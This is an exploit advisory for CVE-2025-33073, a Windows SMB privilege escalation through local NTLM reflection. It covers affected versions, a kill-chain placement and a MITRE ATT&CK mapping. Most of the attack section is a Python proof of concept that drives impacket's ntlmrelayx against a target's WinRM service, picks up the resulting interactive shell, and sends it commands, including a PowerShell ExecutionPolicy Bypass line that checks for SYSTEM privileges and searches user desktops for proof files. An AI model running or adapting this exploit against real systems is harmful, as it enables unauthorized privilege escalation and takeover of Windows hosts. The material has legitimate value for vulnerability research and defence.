============================================================================================================================================= | # Title : Windows 11 V 24H2 SMB Local Privilege Escalation via NTLM Local Reflection | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : System built‑in component. No standalone download available. | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/214224/ & CVE-2025-33073 [+] Summary : CVE‑2025‑33073 is a Microsoft Windows SMB privilege escalation vulnerability that abuses local NTLM reflection behavior within the SMB stack. The vulnerability does not enable remote exploitation by itself, but it breaks key security assumptions in post‑compromise scenarios, especially those involving NTLM authentication and SMB Signing. In affected Windows versions, an attacker who already has local code execution or an authenticated foothold can trigger SMB local loopback authentication in a way that allows NTLM credentials to be reflected back to the same host, potentially resulting in elevated privileges (up to SYSTEM). This vulnerability is particularly dangerous because it can invalidate the protection normally provided by SMB Signing, but only in a local context, making it highly relevant for post‑exploitation, lateral movement preparation, and privilege escalation chains. [+] Windows Versions Impacted by CVE‑2025‑33073 The vulnerability affects several client and server editions of Windows that were unpatched prior to Microsoft’s June2025 security update. Windows 10 Versions (before_patch): Windows 10 Version 1507 Windows 10 Version 1607 Windows 10 Version 1809 Windows 10 Version 21H2 Windows 10 Version 22H2 [+] All with builds earlier than their respective patched builds listed by Microsoft. Windows 11 Versions (before_patch): Windows 11 Version 22H2 Windows 11 Version 23H2 Windows 11 Version 24H2 [+] Affected until the patched builds released in mid‑2025. Windows Server Editions (before_patch): Windows Server 2008 (SP2 & R2 SP1) Windows Server 2012 & 2012 R2 Windows Server 2016 Windows Server 2019 Windows Server 2022 (multiple branch builds) Windows Server 2025 (24H2) [+] All with builds lower than those patched by Microsoft in June2025. [+] Vulnerability Type: Privilege Escalation [+] Component: Microsoft Windows SMB [+] Attack Vector: Local / Same‑host [+] Authentication Required: Yes (local context) [+] Remote Exploitation : No [+] Post‑Exploitation Impact: High [+] Role in a Professional Kill Chain : CVE‑2025‑33073 fits after initial access, not as an entry point: [+] Initial Access : Phishing, credential theft, NTLM relay, or local code execution [+] Execution : Attacker gains user‑level shell or service execution [+] Privilege Escalation : CVE‑2025‑33073 leveraged NTLM Local Reflection enables elevation (SYSTEM context) [+] Credential Access : High‑privilege tokens and credentials become accessible [+] Lateral Movement : Elevated access enables broader network compromise [+] Persistence / Impact : Durable control of the system or domain resources The vulnerability amplifies existing access rather than creating it. [+] MITRE ATT&CK Mapping : - Primary Techniques TA0004 – Privilege Escalation T1068 – Exploitation for Privilege Escalation - Secondary / Contextual Techniques TA0006 – Credential Access T1557 – Adversary‑in‑the‑Middle (Local / Loopback Context) TA0008 – Lateral Movement (indirectly enabled) [+] Relationship to NTLM Relay : Aspect Relation Classic NTLM Relay (Network) No SMB Signing Bypass (Remote) No NTLM Local Reflection Yes Post‑Auth Privilege Escalation Yes [+] Key Insight: CVE‑2025‑33073 does not create NTLM Relay attacks, but it allows NTLM‑based protections to be bypassed locally, even when SMB Signing is enabled. [+] Security Impact : Undermines trust in SMB Signing within local contexts Enables SYSTEM‑level privilege escalation Increases blast radius of otherwise “contained” compromises [+] Especially dangerous in: Red‑team post‑exploitation Breach escalation scenarios Incident response underestimation cases [+] Final Assessment : CVE‑2025‑33073 is a force‑multiplier vulnerability. On its own, it is not an entry vector—but in the hands of an attacker with limited access, it can turn a foothold into full system compromise, making it a critical post‑exploitation risk in modern Windows environments. [+] Usage : python poc.py [+] POC : import os import sys import subprocess import socket import re import logging import signal import time import threading from datetime import datetime from queue import Queue, Empty logger = logging.getLogger("Orchestrator") if not logger.handlers: logger.setLevel(logging.INFO) class SafeFormatter(logging.Formatter): def format(self, record): msg = super().format(record) return re.sub(r'\x1b\[[0-9;]*m', '', "".join(ch for ch in msg if ch.isprintable() or ch in "\n\r\t")) fh = logging.FileHandler(f"relay_orchestrator_{datetime.now().strftime('%m%d_%H%M%S')}.log") fh.setFormatter(SafeFormatter('%(asctime)s [%(levelname)s] %(message)s')) logger.addHandler(fh) ch = logging.StreamHandler(); ch.setFormatter(logging.Formatter('%(message)s')); logger.addHandler(ch) def log_info(msg): logger.info(f"\033[0;34m[*] {msg}\033[0m") def log_success(msg): logger.info(f"\033[0;32m[+] {msg}\033[0m") def log_err(msg): logger.error(f"\033[0;31m[x] {msg}\033[0m") def check_smb_signing_native(target_ip): log_info(f"Checking SMB Signing (Native): {target_ip}...") try: from impacket.smbconnection import SMBConnection # Attempt connection to extract signing status smb = SMBConnection("*", target_ip, sess_port=445, timeout=5) is_required = smb.isSigningRequired() smb.logoff() return is_required except Exception as e: log_err(f"SMB Check failed (Port closed or host unreachable): {e}") return None def post_exploit_analysis(port): ps_payload = ( "$sid = whoami /groups;" "if ($sid -match 'S-1-5-18') { 'STATUS: HIGH INTEGRITY (SYSTEM)' } else { 'STATUS: MEDIUM/LOW PRIVILEGE' };" "Get-ChildItem -Path 'C:\\Users\\*\\Desktop\\*' -Include '*flag*','proof.txt' -File -ErrorAction SilentlyContinue | % { $_.FullName }" ) cmds = f"whoami & hostname\npowershell -NoProfile -ExecutionPolicy Bypass -Command \"{ps_payload}\"\nexit\n" try: with socket.create_connection(("127.0.0.1", int(port)), timeout=10) as s: s.sendall(cmds.encode('utf-8')) s.settimeout(3) buffer = b"" try: while True: chunk = s.recv(8192) if not chunk: break buffer += chunk except socket.timeout: pass try: decoded = buffer.decode('utf-16le') if b'\x00' in buffer else buffer.decode('utf-8') except UnicodeDecodeError: decoded = buffer.decode('utf-8', errors='ignore') log_success(f"Session Analysis Results:\n{decoded.strip()}") except Exception as e: log_err(f"Failed to interact with session on port {port}: {e}") def cleanup_process(proc): """Ensures clean termination of the process tree in Windows and Unix.""" log_info("Cleaning up active processes...") try: if os.name == 'nt': subprocess.run(['taskkill', '/F', '/T', '/PID', str(proc.pid)], capture_output=True) else: os.killpg(os.getpgid(proc.pid), signal.SIGTERM) proc.wait(timeout=5) except Exception: proc.kill() def run_orchestrator(target_ip): port_regex = re.compile(r"Started interactive shell on (?:127\.0\.0\.1|0\.0\.0\.0):(\d+)", re.I) relay_cmd = [sys.executable, "-m", "impacket.examples.ntlmrelayx", "-smb2support", "-t", f"winrms://{target_ip}", "-i"] kwargs = {'creationflags': subprocess.CREATE_NEW_PROCESS_GROUP} if os.name == 'nt' else {'preexec_fn': os.setsid} try: proc = subprocess.Popen(relay_cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True, bufsize=1, **kwargs) q = Queue() def enqueue_output(out, queue): try: for line in iter(out.readline, ''): queue.put(line) except Exception: pass finally: out.close() t = threading.Thread(target=enqueue_output, args=(proc.stdout, q)) t.daemon = True t.start() log_info(f"Orchestrator active.. waiting for forced NTLM auth for {target_ip}") start_time = time.time() while time.time() - start_time < 600: try: line = q.get_nowait() if any(x in line for x in ["Relaying", "Authenticating", "127.0.0.1"]): print(f"\033[0;34m[RELAY]\033[0m {line.strip()}") match = port_regex.search(line) if match: found_port = match.group(1) log_success(f"Active session detected! Allocated Port: {found_port}") post_exploit_analysis(found_port) break except Empty: time.sleep(0.1) if proc.poll() is not None: break cleanup_process(proc) t.join(timeout=1) except Exception as e: log_err(f"Orchestrator management error: {e}") def main(): try: # Check for Impacket dependency import impacket print("\033[0;36m--- NTLM Relay Orchestrator (English Edition) ---\033[0m") target_ip = input("[>] Target IP: ").strip() if not re.match(r"^\d{1,3}(\.\d{1,3}){3}$", target_ip): log_err("Invalid IP format.") return signing_req = check_smb_signing_native(target_ip) if signing_req is True: log_err("SMB Signing is REQUIRED; Relay will likely fail (unless CVE-2025-33073 Local Reflection occurs).") if input("[!] Do you want to proceed anyway? (y/n): ").lower() != 'y': return elif signing_req is False: log_success("SMB Signing is NOT REQUIRED. Target is vulnerable to Relay.") run_orchestrator(target_ip) except KeyboardInterrupt: print("\n[*] Script aborted by user.") sys.exit(0) except ImportError: log_err("Impacket library missing. Install it via: pip install impacket") if __name__ == "__main__": main() Greetings to :============================================================ jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*| ==========================================================================